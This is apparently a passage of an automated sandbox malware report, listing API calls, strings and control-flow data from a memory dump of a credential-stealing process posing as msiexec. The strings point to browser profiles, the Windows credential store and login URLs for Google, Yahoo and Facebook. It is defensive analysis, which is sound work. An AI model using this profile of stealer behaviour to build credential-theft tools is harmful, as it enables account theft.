                                                                                                                                                      • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                        • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                        • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                        • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                        • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                        • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                      • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                        • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                        • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                      • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                      • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                      • API String ID: 2936932814-4196376884
                                                                                                                                                      • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                      • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                      • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                      • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 886 40bdb0-40bdce call 404363 889 40bf63-40bf6f call 40440c 886->889 890 40bdd4-40bddd 886->890 891 40bdee 890->891 892 40bddf-40bdec CredEnumerateW 890->892 894 40bdf0-40bdf2 891->894 892->894 894->889 896 40bdf8-40be18 call 40b2cc wcslen 894->896 899 40bf5d 896->899 900 40be1e-40be20 896->900 899->889 900->899 901 40be26-40be42 wcsncmp 900->901 902 40be48-40be77 call 40bd5d call 404423 901->902 903 40bf4e-40bf57 901->903 902->903 908 40be7d-40bea3 memset 902->908 903->899 903->900 909 40bea5 908->909 910 40bea7-40beea memcpy 908->910 909->910 911 40bf11-40bf2d wcschr 910->911 912 40beec-40bf06 call 40b2cc _wcsnicmp 910->912 914 40bf38-40bf48 LocalFree 911->914 915 40bf2f-40bf35 911->915 912->911 917 40bf08-40bf0e 912->917 914->903 915->914 917->911
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                      • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                      • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                      • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                      • memset.MSVCRT ref: 0040BE91
                                                                                                                                                      • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                      • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                      • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 697348961-0
                                                                                                                                                      • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                      • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                      • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                      • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 00403CBF
                                                                                                                                                      • memset.MSVCRT ref: 00403CD4
                                                                                                                                                      • memset.MSVCRT ref: 00403CE9
                                                                                                                                                      • memset.MSVCRT ref: 00403CFE
                                                                                                                                                      • memset.MSVCRT ref: 00403D13
                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                      • memset.MSVCRT ref: 00403DDA
                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                                                                                      • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                      • API String ID: 1829478387-11920434
                                                                                                                                                      • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                      • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                      • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                      • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 00403E50
                                                                                                                                                      • memset.MSVCRT ref: 00403E65
                                                                                                                                                      • memset.MSVCRT ref: 00403E7A
                                                                                                                                                      • memset.MSVCRT ref: 00403E8F
                                                                                                                                                      • memset.MSVCRT ref: 00403EA4
                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                      • memset.MSVCRT ref: 00403F6B
                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                                                                                      • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                      • API String ID: 1829478387-2068335096
                                                                                                                                                      • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                      • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                      • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                      • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 00403FE1
                                                                                                                                                      • memset.MSVCRT ref: 00403FF6
                                                                                                                                                      • memset.MSVCRT ref: 0040400B
                                                                                                                                                      • memset.MSVCRT ref: 00404020
                                                                                                                                                      • memset.MSVCRT ref: 00404035
                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                      • memset.MSVCRT ref: 004040FC
                                                                                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                                                                                      • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                      • API String ID: 1829478387-3369679110
                                                                                                                                                      • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                      • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                      • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                      • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                      APIs
                                                                                                                                                      • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy
                                                                                                                                                      • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                      • API String ID: 3510742995-2641926074
                                                                                                                                                      • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                      • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                      • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                      • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                      • free.MSVCRT ref: 0041848B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateErrorFileLastfree
                                                                                                                                                      • String ID: |A
                                                                                                                                                      • API String ID: 981974120-1717621600
                                                                                                                                                      • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                      • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                      • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                      • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                        • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                        • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                      • memset.MSVCRT ref: 004033B7
                                                                                                                                                      • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                      • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                      • String ID: $0.@
                                                                                                                                                      • API String ID: 2758756878-1896041820
                                                                                                                                                      • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                      • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                      • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                      • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2941347001-0
                                                                                                                                                      • Opcode ID: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                                                                                                      • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                      • Opcode Fuzzy Hash: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                                                                                                                      • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 00403C09
                                                                                                                                                      • memset.MSVCRT ref: 00403C1E
                                                                                                                                                        • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                        • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                      • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                      • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memsetwcscat$wcscpywcslen
                                                                                                                                                      • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                      • API String ID: 2489821370-1174173950
                                                                                                                                                      • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                      • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                      • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                      • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040A824
                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                      • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                      • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                      • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 669240632-0
                                                                                                                                                      • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                      • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                      • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                      • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                      APIs
                                                                                                                                                      • wcschr.MSVCRT ref: 00414458
                                                                                                                                                      • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                      • String ID: "%s"
                                                                                                                                                      • API String ID: 1343145685-3297466227
                                                                                                                                                      • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                      • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                      • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                      • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                                      • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                      • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                      • API String ID: 1714573020-3385500049
                                                                                                                                                      • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                      • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                      • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                      • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 004087D6
                                                                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                        • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                      • memset.MSVCRT ref: 00408828
                                                                                                                                                      • memset.MSVCRT ref: 00408840
                                                                                                                                                      • memset.MSVCRT ref: 00408858
                                                                                                                                                      • memset.MSVCRT ref: 00408870
                                                                                                                                                      • memset.MSVCRT ref: 00408888
                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2911713577-0
                                                                                                                                                      • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                      • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
